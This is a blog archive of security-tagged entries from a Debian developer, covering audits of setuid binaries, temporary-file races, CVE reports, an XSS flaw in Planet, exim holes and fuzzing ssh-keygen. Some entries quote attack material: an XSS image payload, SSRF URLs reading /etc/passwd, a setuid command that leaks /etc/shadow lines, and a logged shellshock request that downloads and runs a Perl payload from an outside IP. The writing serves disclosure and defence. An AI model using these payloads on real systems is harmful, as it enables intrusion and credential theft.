About Archive Tags RSS Feed

 

Entries tagged security

Oh, didnt i, didnt i, didnt I see you cryin?

8 October 2007 21:50

Curse you Debian! Your programs are too secure...

So I was looking over some setgid binaries last night, seeing if there were any obvious security bugs.

Up popped omega-rpg - a fun game I've recently been playing. Unfortunately it is mostly OK:

  • The insecure support for save-game-compression is disabled for Debian.
  • The use of environmental variables is safe.
  • The use of low-memory detection is disabled on non-MSDOS systems.
  • The console-based input doesn't succumb to badness if you resize your terminal to allow >80 character input.

The only thing that I can is persuade the game to die with a SIGSEG if I manaully edit a save-game file, then load it. I'm sure with care and patience it could be coerced into running shellcode.

In theory this is a security hole. In practise it is hard to take seriously!

On the other hand I'm not convinced the game should be setgid(games)..

| No comments

 

It's been seven hours and fifteen days

26 October 2007 21:50

I made a new release of the Chronicle blog compiler the other day, which seems to be getting a suprising number of downloads from my apt repository.

The apt repository will be updated shortly to drop support for Sarge, since in practise I've not uploaded new things there for a while.

In other news I made some new code for the Debian Administration website! The site now has the notion of a "read-only" state. This state forbids new articles from being posted, new votes being cast, and new comments being posted.

The read-only state is mostly designed for emergencies, and for admin work upon the host system (such as when I'm tweaking the newly installed search engine).

In more coding news I've been updating the xen-shell a little recently, so it will shortly have the ability to checksum the filesystem of Xen guests - and later validate them. This isn't a great security feature because it assumes you trust dom0 - and more importantly to checksum files your guest must be shutdown.

However as a small feature I believe the suggestion was an interesting one.

Finally I've been thinking about system exploitation via temporary file abuse. There are a couple of cases that are common:

  • Creation of an arbitrary (writeable) file upon a host.
  • Creation of an arbitrary (non-writable) file upon a host.
  • Truncation of an existing file upon a host.

Exploiting the first to go from user to root access is trivial. But how would you exploit the last two?

Denial Of Service attacks are trivial via the creation/truncation of /etc/nologin, /etc/shadow, (or even /boot/grub/menu.lst! But gaining privileges? I can't quite see how.

Comments welcome!

| No comments

 

It brings on many changes, and I can take or leave it as I please

15 November 2007 21:50

On Tuesday I released a new version of rinse which now supports Fedora Core 8.

On Wednesday I rebuilt xen-unstable several times, and reported a vaguely security relevant issue against the Exaile music player. I flagged that as important, but I'm not really sure how important it should be. True it works. True it requires DNS takeover, or similar, to become a practical attack, but .. serious or not?

Today I'm wondering about "hiding" messages in debian/changelog files. Each changelog entry includes the time & date of the new revision. I tend to pick the last two digits of the timestamp pretty much as random. (ie. the hours and minutes are always correct, but the seconds is a random value).

Given two digits which may be manipulated in the range 0-59 I'm sure a few small messages could be inserted into a package. But the effort would be high. (Hmmm timezone offset too?)

And that concludes todays entry.

| No comments

 

Adopt a less marital tone.

13 April 2008 21:50

If you upload a new package to the Debian archive which contains a setuid or setgid binary please please ask for a security audit, or carry out one yourself.

I certainly accept that the security audit project webpages are not terribly current, and the mailing list is essentially dead, but there are people, such as myself, who would gladly look at your package. All you have to do is ask.

When I see two packages in testing with trivialy obvious security bugs it just makes me wonder why we bother.

I'm going to take this chance to restate my hardline position on package maintainence - even though it might not be directly applicable - If you cannot program/debug/handle the language a package is developed in you shouldn't maintain it.

Too often I've seen signs of this; somebody maintaining a C-based program but unable to program in C. Why?

I wonder if we could have a policy / guideline that any new setuid/setgid application must have at least two maintainers, or a documented audit prior to acceptance? Hard to manage but I think it would be useful even if it didn't catch everything. Some bugs such as #475747 (lovely number!) are trivial to discover.

ObQuote: Dangerous Liaisons

| No comments

 

I still don't know why I'm here

14 May 2008 21:50

I wasn't going to comment on the recent openssl security update, because too many people have already done so.

Personally I thought that Aigars Mahinovs made the best writeup I've seen so far.

However I would like to say that having 20+ people all mailing security[at]debian.org to say the webpage we referenced in the security advisory is currently blank is not useful, or ask for details already released in the advisory they replied to, or ask for even more details is not so much fun.

Having people immediately start mailing questions like "Huh? What can I do" is only natural, but you can't expect a response when things are as hectic as they have been recently. Ideally people would sit on their hands and bite their tongues. Realistically that isn't going to happen, and realistically this post will make no difference either...

Had the issue not leaked to unstable so quickly (and inappropriately IMHO) then we'd have had a little more time. But once an issue is reported you need to coordinate with other distributions, and etc. Handling something as severe as this is not fun, and random mails from users are a distraction, and a resource-hog.

I should say I was not in any way involved in the discovery, the reporting, the preparation of the fix(es), or the releasing of the update. I knew it was coming, but everybody else seemed to have it well in hand. When there are mails going back and forth for 5+ days with ever-growing Cc: lists, and mailing lists being involved I figure one more cook wouldn't be useful.

So in conclusion:

a. Bad hole.

b. Fixing this will take years, probably.

c. 50+ mails to the security team within an hour of the advisory going public complaining of missing information is not helpful, not useful, and quite irritating. (Albeit understandable).

d. People who don't know the details of an attack, or issue, shouldn't speculate and start panic, fear, and confusion. Esp. when details are a little vague.

e. I still like pies.

Once again thanks to everybody who was involved and put in an insane amount of work. Yes this is only the start - our users have to suffer the pain of regenerating everything - but we did good.

Really. Debian did good.

It might not look like it right now, but it could have been so much worse, and Debian did do good.

ObQuote: X-Men: The Last Stand

| 7 comments

 

Well, are you sure you're using that thing correctly?

31 October 2008 21:50

In response to the comments left on my previous entry about executable configuration files I've changed the way that tscreen works.

There is still support for using an arbitrary shell script or binary as a configuration file, but you must be explicit to enable it:

#
#  Load the dynamic section, if it exists.
#
if -x ~/.tscreen.dynamic  'source ~/.tscreen.dynamic|'

The change here is the trailing "|" on the argument to the source command:

source ~/foo/bar

Opens ~/foo/bar and parses the contents. (Assuming it exists.)

source ~/bin/blah|

Executes ~/bin/blah and parses the output. (Assuming it exists)

I still see no security risk with the previous setup, but I'm happy to apply a little misdirection if that makes people feel better.

ObFilm: Ghostbusters

| 4 comments

 

Have you been following that man?

27 November 2008 21:50

meta-hacking

I've had a lot of fun over the past few years detecting and fixing XSS attacks - a few months ago compromising several thousand user-accounts belonging to a particular niche social networking site and then more recently experimenting with XSS issues upon a popular software developer's advocate blog.

One thing I've been wondering about recently is meta-XSS attacks.

Consider the LKML (linux kernel mailing list). This list receives lots of long patches, submitted by email, which are copied verbatum to various sites. For example if I mailed an interesting patch to LKML chances are it would get posted to:

(Obviously the challenge here is to make a patch sufficiently interesting that it received more than usual coverage.)

Do each of those sites HTML-encode patches? In general they do, certainly the ones I looked at had code like this:

#include <linux.h>
...
...

But I'm certain that not all sites do so. I'm also pretty sure there are interesting avenues to explore here, and the general idea of indirectly attacking a specific target is ripe for exploration.

Anyway I'm probably not the person to go playing in the field these days; I don't have the time. But it is certainly interesting to think about.

ObFilm: Dirty Harry

| No comments

 

I may have kept you chained up in that room but it was for your own good.

21 March 2009 21:50

Last week I resigned from my position as member of the Debian Security Team.

Historically several Debian teams have had members inactive for months and years at a time, and I'd rather be removed of my own volition than end up listed but inactive like that.

It's been a pleasure working with all members of the team, past and current (especially Joey), and who knows I might return in the future.

If you're interested in security work then getting involved isn't difficult. It just takes time, patience, and practise.

ObFilm: The Goonies

| No comments

 

I'm gonna forget this conversation ever took place.

24 June 2009 21:50

Recently I mentioned I'd been hacking about with a simple IMAP server.

Yesterday I was working on it some more, because the message store I've been testing against contains about 8 million messages and the damn thing is too slow.

During the course of some tweaking I discovered something interesting, every time a specific IMAP client connected to my server it crashed...

I spent a while fiddling around with backtraces and suchlike, but the upshot is I'm still not sure where the client crashes, but I've mailed some details to a few people to see if we can get it narrowed down.

I guess this counts as an accidental security issue. I wonder if I'll be able to collect a bounty? (Not that I'm bitter about past bounty-worthy reports being ignored ;)

Anyway interesting times, when I least expected them.

Mostly this post is being made to test a new release of the chronicle blog compiler - which now allows gravitars and has improved display of comments as demonstrated here.

ObFilm: Rambo First Blood Part II

| 1 comment

 

Nobody touches the second shelf but me.

27 June 2009 21:50

It seems the IMAP client crash I accidentally discovered in Thunderbird/Icedove was already known.

My report is a duplicate of a bug which was previously reported in 2007. Oops.

ObFilm: The Lost Boys

| 2 comments

 

Hack the planet!

22 September 2009 21:50

Recently I was viewing Planet Debian and there was an entry present which was horribly mangled - although the original post seemed to be fine.

It seemed obvious to me that that some of the filtering which the planet software had applied to the original entry had caused it to become broken, malformed, or otherwise corrupted. That made me wonder what attacks could be performed against the planet aggregator software used on Planet Debian.

Originally Planet Debian was produced using the planet software.

This was later replaced with the actively developed planet-venus software instead.

(The planet package has now been removed from Debian unstable.)

Planet, and the Venus project which forked from it, do a great job at scrutinising their input and removing malicious content. So my only hope was to stumble across something they had missed. Eventually I discovered the (different) filtering applied by the two feed aggregators missed the same malicious input - an image with a src parameter including javascript like this:

<img src="javascript:alert(1)">

When that markup is viewed by some browsers it will result in the execution of javascript. In short it is a valid XSS attack which the aggregating software didn't remove, protect against, or filter correctly.

In fairness it seems most of the browsers I tested didn't actually alert when viewing that code - but as a notable exception Opera does.

I placed a demo online to test different browsers:

If your browser executes the code there, and it isn't Opera, then please do let me know!

The XSS testing of planets

Rather than produce a lot of malicious input feeds I constructed and verified my attack entirely off line.

How? Well the planet distribution includes a small test suite, which saved me a great deal of time, and later allowed me to verify my fix. Test suites are good things.

The testing framework allows you to run tiny snippets of code such as this:

# ensure onblur is removed:
HTML( "<img src=\"foo.png\" onblur=\"alert(1);\" />",
      "<img src=\"foo.png\" />" );;

Here we give two parameters to the HTML function, one of which is the input string, and the other is the expected output string - if the sanitization doesn't produce the string given as the expected result an error is raised. (The test above is clearly designed to ensure that the onblur attribute and its value is removed.)

This was how I verified initially that the SRC attribute wasn't checked for malicious content and removed as I expected it to be.

Later I verified this by editing my blog's RSS feed to include a malicious, but harmless, extra section. This was then shown upon the Planet Debian output site for about 12 hours.

During the twelve hour window in which the exploit was "live" I received numerous hits. Here's a couple of log entries (IP + referer + user-agent):

xx.xx.106.146 "http://planet.debian.org/" "Opera/9.80
xx.xx.74.192  "http://planet.debian.org/" "Opera/9.80
xx.xx.82.143  "http://planet.debian.org/" "Opera/9.80
xx.xx.64.150  "http://planet.debian.org/" "Opera/9.80
xx.xx.20.18   "http://planet.debian.net/" "Opera/9.63
xx.xx.42.61   "-"                         "gnome-vfs/2.16.3
..

The Opera hits were to be expected from my previous browser testing, but I'm still not sure why hits were with from User-Agents identifying themselves as gnome-vfs/n.n.n. Enlightenment would be rewarding.

In conclusion the incomplete escaping of input by Planet/Venus was allocated the identifier CVE-2009-2937, and will be fixed by a point release.

There are a lot of planets out there - even I have one: Pluto - so we'll hope Opera is a rare exception.

(Pluto isn't a planet? I guess thats why I call my planet a special planet ;)

ObFilm: Hackers.

| 6 comments

 

jQuery in use upon this blog

30 August 2010 21:50

Blog Update

I've just updated the home-grown javascript I was using upon this blog to be jQuery powered.

This post is a test.

I'll need to check but I believe I'm almost 100% jQuery-powered now.

AJAX Proxies

It is a well-known fact that AJAX requests are only allowed to be made to the server the javascript was loaded from. The so-called same-origin security restriction.

To pull content from other sites users are often encouraged to write a simple proxy:

  • http://example.com/ serves Javascript & HTML.
  • http://example.com/proxy/http://example.com allows arbitrary fetching.

Simples? No. Too many people write simple proxies which use PHP's curl function, or something similar, with little restriction on either the protocol or the destination of the requested resource.

Consider the following requests:

  • http://example.com/proxy.php?url=/etc/passwd
  • http://example.com/proxy.php?url=file:///etc/passwd

If you're using some form of Javascript/AJAX proxy make sure you test for this. (ObRandom: Searching google for inurl:"proxy.php?url=http:" shows this is a real problem. l33t.)

ObQuote: "You're asking me out? That's so cute! What's your name again? " - 10 things I hate about you.

| No comments

 

The remote root hole in exim4 is painful

12 December 2010 21:50

Recently I noticed a report of an alleged remote root security compromise of a machine, via the exim mailserver.

At the time I wasn't sure how seriously to take it, but I followed updates on the thread and it soon became clear that there was a major problem on our hands.

It later became obvious that there were two problems:

CVE-2010-4344

A remote buffer overflow, allowing the execution of arbitrary code as the user Debian-exim.

CVE-2010-4345

A privilege escelation allowing the attacker to jump from running code as Debian-exim to running code as root.

Trivial exploits are floating around the internet - and we were seeing this bug be exploited in the wild as early as yesterday afternoon.

Although I can feel somewhat smug that my own personal server is running qpsmtpd ahead of exim it's still a wake-up call, and this hole has the potential to significantly expand available botnets - it is probably only a matter of days hours until we see worms taking advantage of the flaw.

ObPlug: I've put together an updated version of exim4 for etch - if you're still running etch then you don't have any official security support (timely upgrading is obviously preferred) and it might be useful to have more folk pointed at that..

ObQuote: "We're all going to die down here" - Resident Evil.

| 7 comments

 

Why I lose interest in some projects.

18 February 2011 21:50

Some projects have historically sucked; they've been incomplete, they've been hard to use, they've had poor documentation, or they've had regular security issues.

Over time projects that started off a little poorly can, and often do, improve. But their reputation is usually a long time in improving.

For me? Personally? PHPMyAdmin is a security nightmare. So while it is nice to read about it gaining the ability to be themed, and even receiving submissiosn from users (a rare thing for projects to receive such external contributions) I just find it hard to care.

I see PHPMyAdmin written in a blog, in a news article, or on a users machine and I just think :

  • "PHPMyAdmin? That's that thing that has security problems."

Harsh. Unfair. Possibly no longer true. But I do tend to stick to such judgements, and I'm sure I'm not alone.

Ideally people wouldn't be dogmatic, would be open-minded about re-evaluation situations. In practise I'm probably not such a unique little snowflake, and there are probably a great many people to this day who maintain views which that are based on historical situations than the current-day reality:

  • Java is slow and verbose.
  • Perl is line-noise.
  • Sendmail is an insecure mess.
  • ...

Anyway. PHPMyAdmin? I'm sorry for singling you out, even with your fancy themes, language translations, and other modern updates. It's just a name that conjours deamons for me. Though I'm sure there are a great number of people who love it to pieces.

ObQuote: "You don't want to know my name. I don't want to know your name. " - Spartacus

| 7 comments

 

So I chose fabric and reported a bug..

6 June 2011 21:50

When soliciting for opinions, recently, I discovered that the python-based fabric tool was not dead, and was in fact perfect for my needs.

During the process of getting acquainted with it I looked over the source code, it was mostly neat but there was a trivial (low-risk) symlink attack present.

I reported that as #629003 & it is now identified more globally as CVE-2011-2185.

I guess this goes to show that getting into the habit of looking over source code when you install a new package is a worthwhile thing to do; and probably easier than organising a distribution-wide security audit </irony>.

In other news I'm struggling to diagnose a perl segfault, when running a search using the swish-a perl modules. Could it be security worthy? Possibly. Right now I just don't want my scripts to die when I attempt to search 20Gb of syslog data. Meh.

ObQuote: "You're scared of mice and spiders, but oh-so-much greater is your fear that one day the two species will cross-breed to form an all-powerful race of mice-spiders who will immobilize human beings in giant webs in order to steal cheese. " - Spaced.

| No comments

 

Some misc. updates

13 January 2012 21:50

Security

Today I made available a 3.2.0 kernel for my KVM guest which has a bastardised version of the PID hiding patch configured:

So now on my guest, as myself, I can only see this:

steve@steve:~$ ls -l /proc/ | egrep ' [0-9]+$'
dr-xr-xr-x  7 steve users          0 Jan 13 17:22 15150
dr-xr-xr-x  7 steve users          0 Jan 13 17:29 15739
dr-xr-xr-x  7 steve users          0 Jan 13 17:29 15740
lrwxrwxrwx  1 root  root          64 Jan 13 17:20 self -> 15739

Running as root I see the full tree:

steve:~#  ls -l /proc/ | egrep ' [0-9]+$'
total 0
dr-xr-xr-x  7 root        root                 0 Jan 13 17:20 1
dr-xr-xr-x  7 root        root                 0 Jan 13 17:20 1052
dr-xr-xr-x  7 root        root                 0 Jan 13 17:20 1086
dr-xr-xr-x  7 root        root                 0 Jan 13 17:20 1101
dr-xr-xr-x  7 root        root                 0 Jan 13 17:20 1104
dr-xr-xr-x  7 root        root                 0 Jan 13 17:21 1331
dr-xr-xr-x  7 pdnsd       proxy                0 Jan 13 17:21 14409
dr-xr-xr-x  7 root        root                 0 Jan 13 17:21 14519
..

This (obviously) affects output from top etc too. It is a neat feature which I think is worth having, but time will tell..

mod_ifier

A long time ago I put together an Apache module which allowed the evaluation of security rules against incoming HTTP requests. mod_ifier was largely ignored by the world. But this week it did receive a little attention.

The recent rash of Hash Collision attacks inspired inspired a fork with parameter filtering. Neat.

Otherwise nothing too much to report - though I guess I didn't actually share the link to the RESTful file store I mentioned previously. Should you care you can find it here:

ObQuote: "I saw a man, he danced with his wife" - Chicago, Frank Sinatra

| 2 comments

 

Misc update.

8 July 2012 21:50

I got a few emails about the status panel I'd both toyed with and posted. The end result is that the live load graphs now have documentation, look prettier, and contain a link to the source code.

Apart from that this week has mostly involved photographing cute cats, hairy dogs, and women in corsets.

In Debian-related news njam: Insecure usage of environmental variable was closed after about 7 months, and I reported a failure of omega-rpg to drop group(games) privileges prior to saving game-state. That leads to things like this:

skx@precious:~$ ls -l | grep games
-rw-r--r--   1 skx games   14506 Jul  8 15:20 Omega1000

Not the end of the world, but it does mean you can write to directories owned by root.games, and potentially over-write level/high-score files in other packages leading to compromises.

ObQuote: "Your suffering will be legendary, even in hell! " - Hellraiser II (Did you know there were eight HellRaiser sequels?)

| No comments

 

A good week?

29 December 2013 21:50

This week my small collection of sysadmin tools received a lot of attention; I've no idea what triggered it, but it ended up on the front-page of github as a "trending repository".

Otherwise I've recently spent some time "playing about" with some security stuff. My first recent report wasn't deemed worthy of a security update, but it was still a fun one. From the package description rush is described as:

GNU Rush is a restricted shell designed for sites providing only limited access to resources for remote users. The main binary executable is configurable as a user login shell, intended for users that only are allowed remote login to the system at hand.

As the description says this is primarily intended for use by remote users, but if it is installed locally you can read "any file" on the local system.

How? Well the program is setuid(root) and allows you to specify an arbitrary configuration file as input. The very very first thing I tried to do with this program was feed it an invalid and unreadable-to-me configuration file.

Helpfully there is a debugging option you can add --lint to help you setup the software. Using it is as simple as:

shelob ~ $ rush --lint /etc/shadow
rush: Info: /etc/shadow:1: unknown statement: root:$6$zwJQWKVo$ofoV2xwfsff...Mxo/:15884:0:99999:7:::
rush: Info: /etc/shadow:2: unknown statement: daemon:*:15884:0:99999:7:::
rush: Info: /etc/shadow:3: unknown statement: bin:*:15884:0:99999:7:::
rush: Info: /etc/shadow:4: unknown statement: sys:*:15884:0:99999:7:::
..

How nice?

The only mitigating factor here is that only the first token on the line is reported - In this case we've exposed /etc/shadow which doesn't contain whitespace for the interesting users, so it's enough to start cracking those password hashes.

If you maintain a setuid binary you must be trying things like this.

If you maintain a setuid binary you must be confident in the codebase.

People will be happy to stress-test, audit, examine, and help you - just ask.

Simple security issues like this are frankly embarassing.

Anyway that's enough: #733505 / CVE-2013-6889.

| No comments

 

Time to mix things up again

20 March 2014 21:50

I'm currently a contractor, working for/with Dyn, until April the 11th.

I need to decide what I'm doing next, if anything. In the meantime here are some diversions:

Some trivial security issues

I noticed and reported two more temporary-file issues insecure temporary file usage in apt-extracttemplates (apt), and libreadline6: Insecure use of temporary files - in _rl_trace.

Neither of those are particularly serious, but looking for them took a little time. I recently started re-auditing code, and decided to do three things:

  • Download the source code to every package installed upon this system.
  • Download the source code to all packages matching the pattern ^libpam-, and ^libruby-*.

I've not yet finished slogging through the code, but my expectation will be a few more issues. I'll guess 5-10, given my cynical nature.

NFS-work

I've been tasked with the job of setting up a small cluster running from a shared and writeable NFS-root.

This is a fun project which I've done before, PXE-booting a machine and telling it to mount a root filesystem over NFS is pretty straight-forward. The hard part is making that system writeable, such that you can boot and run "apt-get install XX". I've done it in the past using magic filesystems, or tmpfs. Either will work here, so I'm not going to dwell on it.

Another year

I had another birthday, so that was nice.

My wife took me to a water-park where we swam like fisheseses, and that tied in nicely with a recent visit to Deep Sea World, where we got to walk through a glass tunnel, beneath a pool FULL OF SHARKS, and other beasties.

Beyond that I received another Global Knife, which has now been bloodied, since I managed to slice my finger open chopping mushrooms on Friday. Oops. Currently I'm in that annoying state where I'm slowly getting used to typing with a plaster around the tip of my finger, but knowing that it'll have to come off again and I'll get confused again.

Linux Distribution

I absolutely did not start working on a "linux distribution", because that would be crazy. Do I look like a crazy-person?

All I did was play around with GNU Stow, and ponder the idea of using a minimal LibC and GNU Stow to organize things.

It went well, but the devil is always in the details.

I like the idea of a master-distribution which installs pam, ssh, etc, but then has derivitives for "This is a webserver", "This is a Ruby server", and "This is a database server".

Consider it like task-selection, but with higher ambition.

There's probably more I could say; a new kitchen sink (literally) and a new tap have made our kitchen nicer, I've made it past six months of regular gym-based workouts, and I didn't die when I went to the beach in the dark the other night, so that was nice.

Umm? Stuff?

Have a nice day. Thanks.

| 2 comments

 

New GPG-key

24 March 2014 21:50

I've now generated a new GPG-key for myself:

$ gpg --fingerprint 229A4066
pub   4096R/0C626242 2014-03-24
      Key fingerprint = D516 C42B 1D0E 3F85 4CAB  9723 1909 D408 0C62 6242
uid                  Steve Kemp (Edinburgh, Scotland) <steve@steve.org.uk>
sub   4096R/229A4066 2014-03-24

The key can be found online via mit.edu : 0x1909D4080C626242

This has been signed with my old key:

pub   1024D/CD4C0D9D 2002-05-29
      Key fingerprint = DB1F F3FB 1D08 FC01 ED22  2243 C0CF C6B3 CD4C 0D9D
uid                  Steve Kemp <steve@steve.org.uk>
sub   2048g/AC995563 2002-05-29

If there is anybody who has signed my old key who wishes to sign my new one then please feel free to get in touch to arrange it.

| No comments

 

I've not commented on security for a while

22 April 2014 21:50

Unless you've been living under a rock, or in a tent (which would make me slightly jealous) you'll have heard about the recent heartbleed attack many times by now.

The upshot of that attack is that lots of noise was made about hardening things, and there is now a new fork of openssl being developed. Many people have commented about "hardening Debian" in particular, as well as random musing on hardening software. One or two brave souls have even made noises about auditing code.

Once upon a time I tried to setup a project to audit Debian software. You can still see the Debian Security Audit Project webpages if you look hard enough for them.

What did I learn? There are tons of easy security bugs, but finding the hard ones is hard.

(If you get bored some time just pick your favourite Editor, which will be emacs, and look how /tmp is abused during the build-process or in random libraries such as tramp [ tramp-uudecode].)

These days I still poke at source code, and I still report bugs, but my enthusiasm has waned considerably. I tend to only commit to auditing a package if it is a new one I install in production, which limits my efforts considerably, but makes me feel like I'm not taking steps into the dark. It looks like I reported only three security isseus this year, and before that you have to go down to 2011 to find something I bothered to document.

What would I do if I had copious free time? I wouldn't audit code. Instead I'd write test-cases for code.

Many many large projects have rudimentary test-cases at best, and zero coverage at worse. I appreciate writing test-cases is hard, because lots of times it is hard to test things "for real". For example I once wrote a filesystem, using FUSE, there are some built-in unit-tests (I was pretty pleased with that, you could lauch the filesystem with a --test argument and it would invoke the unit-tests on itself. No separate steps, or source code required. If it was installed you could use it and you could test it in-situ). Beyond that I also put together a simple filesystem-stress script, which read/wrote/found random files, computes MD5 hashes of contents, etc. I've since seen similar random-filesystem-stresstest projects, and if they existed then I'd have used them. Testing filesystems is hard.

I've written kernel modules that have only a single implicit test case: It compiles. (OK that's harsh, I'd usually ensure the kernel didn't die when they were inserted, and that a new node in /dev appeared ;)

I've written a mail client, and beyond some trivial test-cases to prove my MIME-handling wasn't horrifically bad there are zero tests. How do you simulate all the mail that people will get, and the funky things they'll do with it?

But that said I'd suggest if you're keen, if you're eager, if you want internet-points, writing test-cases/test-harnesses would be more useful than randomly auditing source code.

Still what would I know, I don't even have a beard..

| 1 comment

 

Some brief updates

8 May 2014 21:50

Some brief notes, between tourist-moments.

Temporary file races

I reported some issues against the lisp that is bundled with GNU Emacs, the only one of any significance related to the fall-back uudecode option supported by tramp.el.

(tramp allows you to edit files remotely, it is awesome.)

Inadvertantly I seem to have received a CVE identifier refering to the Mosaic web-browser. Damn. That's an old name now.

Image tagging

A while back I wrote about options for tagging/finding images in large collections.

Taking a step back I realized that I mostly file images in useful hierarchies:

Images/People/2014/
Images/People/2014/01/
Images/People/2014/01/03-Heidi/{ RAW JPG thumbs }
Images/People/2014/01/13-Hanna/{ RAW JPG thumbs }
..

On that basis I just dropped a .meta file in each directory with brief notes. e.g:

name     = Jasmine XXX
location = Leith, Edinburgh
source   = modelmayhem
theme    = umbrella, rain, water
contact  = 0774xxxxxxx

Then I wrote a trivial perl script to find *.meta - allowing me to create IMAGE_123.CR2.meta too - and the job was done.

Graphical Applications

I'm currently gluing parts of Gtk + Lua together, which is an experiment to see how hard it is to create a flexible GUI mail client. (yeah.)

So far its easy if I restrict the view to three-panes, but I'm wondering if I can defer that, and allow the user to handle the layout 100%. I suspect "not easily".

We'll see, since I'm not 100% sold on the idea of a GUI mail client in the first place. Still it is a diversion.

Finland

I actually find myself looking forward to my next visit which is .. interesting?

| No comments

 

Sometimes reading code makes you scream.

30 May 2014 21:50

So I've recently been looking at proxy-server source code, for obvious reasons. The starting point was a simple search of the available options:

~$ apt-cache search proxy filter
...
trafficserver - fast, scalable and extensible HTTP/1.1 compliant caching proxy server
ssh-agent-filter - filtering proxy for ssh-agent

Hrm? trafficserver? That sounds like fun. Lets look at the source.

cd /tmp
apt-get source trafficserver

Lots of code, but scanning it quickly with my favourite tool, grep, we find this "gem":

$ rgrep /tmp .
./mgmt/tools/SysAPI.cc:  tmp = fopen("/tmp/shadow", "w");
./mgmt/tools/SysAPI.cc:    system("/bin/mv -f /tmp/shadow /etc/shadow");

Is that really what it looks like? Really? Sadly yes.

There's lots of abuse of /tmpfiles in the code in mgmt/tools/, and although the modular structure took a while to understand the code that is compiled here ultimately ends up being included in /usr/bin/traffic_shell. That means it is a "real" security issue, allowing race-tastic local-attackers to do bad things.

Bug reported as #749846.

In happier news, the desk I was building is now complete. Pretty.

 

I feel like I should write about auditing software, but equally I feel unqualified - better people than me have already done so, e.g. David Wheeler.

Also I've done it before, and nobody paid attention. (Or rather the poeple that should consider security frequently fail to do so, which is .. frustrating.)

| 4 comments

 

So what can I do for Debian?

16 July 2014 21:50

So I recently announced my intention to rejoin the Debian project, having been a member between 2002 & 2011 (inclusive).

In the past I resigned mostly due to lack of time, and what has changed is that these days I have more free time - primarily because my wife works in accident & emergency and has "funny shifts". This means we spend many days and evenings together, then she might work 8pm-8am for three nights in a row, which then becomes Steve-time, and can involve lots of time browsing reddit, coding obsessively, and watching bad TV (currently watching "Lost Girl". Shades of Buffy/Blood Ties/similar. Not bad, but not great.)

My NM-progress can be tracked here, and once accepted I have a plan for my activities:

  • I will minimally audit every single package running upon any of my personal systems.
  • I will audit as many of the ITP-packages I can manage.
  • I may, or may not, actually package software.

I believe this will be useful, even though there will be limits - I've no patience for PHP and will just ignore it, along with its ecosystem, for example.

As progress today I reported #754899 / CVE-2014-4978 against Rawstudio, and discussed some issues with ITP: tiptop (the program seems semi-expected to be installed setuid(0), but if it is then it will allow arbitrary files to be truncated/overwritten via "tiptop -W /path/to/file"

(ObRandom still waiting for a CVE identifier for #749846/TS-2867..)

And now sleep.

| 4 comments

 

Did you know xine will download and execute scripts?

19 July 2014 21:50

Today I was poking around the source of Xine, the well-known media player. During the course of this poking I spotted that Xine has skin support - something I've been blissfully ignorant of for many years.

How do these skins work? You bring up the skin-browser, by default this is achieved by pressing "Ctrl-d". The browser will show you previews of the skins available, and allow you to install them.

How does Xine know what skins are available? It downloads the contents of:

NOTE: This is an insecure URL.

The downloaded file is a simple XML thing, containing references to both preview-images and download locations.

For example the theme "Sunset" has the following details:

  • Download link: http://xine.sourceforge.net/skins/Sunset.tar.gz
  • Preview link: http://xine.sourceforge.net/skins/Sunset.png

if you choose to install the skin the Sunset.tar.gz file is downloaded, via HTTP, extracted, and the shell-script doinst.sh is executed, if present.

So if you control DNS on your LAN you can execute arbitrary commands if you persuade a victim to download your "corporate xine theme".

Probably a low-risk attack, but still a surprise.

| 5 comments

 

luonnos viesti - 31 heinäkuu 2014

31 July 2014 21:50

Yesterday I spent a while looking at the Debian code search site, an enormously useful service allowing you to search the code contained in the Debian archives.

The end result was three trivial bug reports:

#756565 - lives

Insecure usage of temporary files.

A CVE-identifier should be requested.

#756566 - libxml-dt-perl

Insecure usage of temporary files.

A CVE-identifier has been requested by Salvatore Bonaccorso, and will be added to my security log once allocated.

756600 - xcfa

Insecure usage of temporary files.

A CVE-identifier should be requested.

Finding these bugs was a simple matter of using the code-search to look for patterns like "system.*>.*%2Ftmp".

Perhaps tomorrow somebody else would like to have a go at looking for backtick-related operations ("`"), or the usage of popen.

Tomorrow I will personally be swimming in a loch, which is more fun than wading in code..

| 2 comments

 

Paying attention to webserver logs

2 December 2014 21:50

If you run a webserver chances are high that you'll get hit by random exploit-attempts. Today one of my servers has this logged - an obvious shellshock exploit attempt:

92.242.4.130 blog.steve.org.uk - [02/Dec/2014:11:50:03 +0000] \
"GET /cgi-bin/dbs.cgi HTTP/1.1" 404 2325 \
 "-" "() { :;}; /bin/bash -c \"cd /var/tmp ; wget http://146.71.108.154/pis ; \
curl -O http://146.71.108.154/pis;perl pis;rm -rf pis\"; node-reverse-proxy.js"

Yesterday I got hit with thousands of these referer-spam attempts:

152.237.221.99 - - [02/Dec/2014:01:06:25 +0000] "GET / HTTP/1.1"  \
200 7425 "http://buttons-for-website.com" \
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.143 Safari/537.36"

When it comes to stopping dictionary attacks against SSH servers we have things like denyhosts, fail2ban, (or even non-standard SSH ports).

For Apache/webserver exploits we have? mod_security?

I recently heard of apache-scalp which seems to be a project to analyse webserver logs to look for patterns indicative of attack-attempts.

Unfortunately the suggested ruleset comes from the PHP IDS project and are horribly bad.

I wonder if there is any value in me trying to define rules to describe attacks. Either I do a good job and the rules are useful, or somebody else things the rules are bad - which is what I thought of hte PHP-IDS set - I guess it's hard to know.

For the moment I look at the webserver logs every now and again and shake my head. Particularly bad remote IPs get firewalled and dropped, but beyond that I guess it is just background noise.

Shame.

| 14 comments

 

So about that idea of using ssh-keygen on untrusted input?

12 October 2015 21:50

My previous blog post related to using ssh-keygen to generate fingerprints from SSH public keys.

At the back of my mind was the fear that running the command against untrusted, user-supplied, keys might be a bad plan. So I figured I'd do some fuzzing to reassure myself.

The most excellent LWN recently published a piece on Fuzzing with american fuzzy lop, so with that to guide me I generated a pair of SSH public keys, and set to work.

Two days later I found an SSH public key that would make ssh-keygen segfault, and equally the SSH client (same parser), so that was a shock.

The good news is that my Perl module to fingerprint keys is used like so:

my $helper = SSHKey::Fingerprint->new( key => "ssh ...." );
if ( $helper->valid() ) {
   my $fingerprint = $helper->fingerprint();
   ...
}

The validity-test catches my bogus key, so in my personal use-cases this OK. That said it's a surprise to see this:

skx@shelob ~ $ ssh -i key.trigger.pub steve@ssh.steve.org.uk 
Segmentation fault

Similarly running "ssh-keygen -l -f ~/key.trigger.pub" results in an identical segfault.

